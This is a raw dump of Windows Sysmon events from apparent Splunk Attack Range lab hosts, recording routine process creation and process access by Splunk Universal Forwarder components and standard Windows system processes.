AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286960Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.967{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C15D2D2E3BB88139282936EDEB0349B3,SHA256=6C0F8780D44C2930604223ED259F3F97B79F8C68FE23BE6BA249577C289AFD10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215869Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:20.944{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F2B7A43138A2D863D2463F0DF24A103,SHA256=2C440FA87BDD9F8DA5FE4D15178224AD6360B9C2305202AF47070EC47895C134,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286959Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.844{C8EA50B7-107C-6216-EE04-000000003802}20083568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286958Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.639{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-107C-6216-EE04-000000003802}2008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286957Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.639{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286956Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.639{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286955Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.639{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286954Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.639{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286953Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.639{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-107C-6216-EE04-000000003802}2008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286952Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.639{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-107C-6216-EE04-000000003802}2008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286951Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.640{C8EA50B7-107C-6216-EE04-000000003802}2008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000286950Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.358{C8EA50B7-107C-6216-ED04-000000003802}14165184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286949Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.139{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-107C-6216-ED04-000000003802}1416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286948Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.139{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286947Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.139{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286946Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.139{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286945Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.139{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286944Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.139{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-107C-6216-ED04-000000003802}1416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286943Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.139{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-107C-6216-ED04-000000003802}1416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286942Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:20.140{C8EA50B7-107C-6216-ED04-000000003802}1416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215870Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:21.944{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=455C80C92379514F1CC95813E7B82ACA,SHA256=D481C59C30590B2817206F15605693F710063B9EAF8D99CFE1A7F9ACDD09AEFA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286968Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:21.279{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-107D-6216-EF04-000000003802}5716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286967Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:21.279{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286966Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:21.279{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286965Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:21.279{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286964Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:21.279{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286963Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:21.279{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-107D-6216-EF04-000000003802}5716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286962Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:21.279{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-107D-6216-EF04-000000003802}5716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286961Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:21.282{C8EA50B7-107D-6216-EF04-000000003802}5716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 